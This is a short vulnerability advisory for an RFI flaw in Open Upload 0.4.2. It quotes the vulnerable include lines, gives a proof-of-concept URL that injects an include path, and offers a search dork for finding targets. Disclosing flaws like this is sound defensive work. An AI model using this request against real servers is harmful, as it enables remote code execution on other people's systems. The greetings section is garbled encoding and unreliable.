Open Upload 0.4.2 Remote File Inclusion

Open Upload version 0.4.2 suffers from a remote file inclusion vulnerability.


MD5 | 88009473850f6826d6d48cca78c3534d

========================================================================
| # Title : Openupload 0.4.2 RFI vulnerability
| # Author : indoushka
| # email : [email protected]
| # Tested on : windows 10 FranASSais V.(Pro)
| # Version : 0.4.2
| # Vendor : http://wmscripti.com/
| # Dork : open upload - login
========================================================================

poc :

www/index.php

line 61,62
require_once($configfile);
require_once($CONFIG['INSTALL_ROOT'].'/lib/general.inc.php');

127.0.0.1/open/www/index.php?CONFIG['INSTALL_ROOT']= ev!l

Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz |
|
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================

Related Posts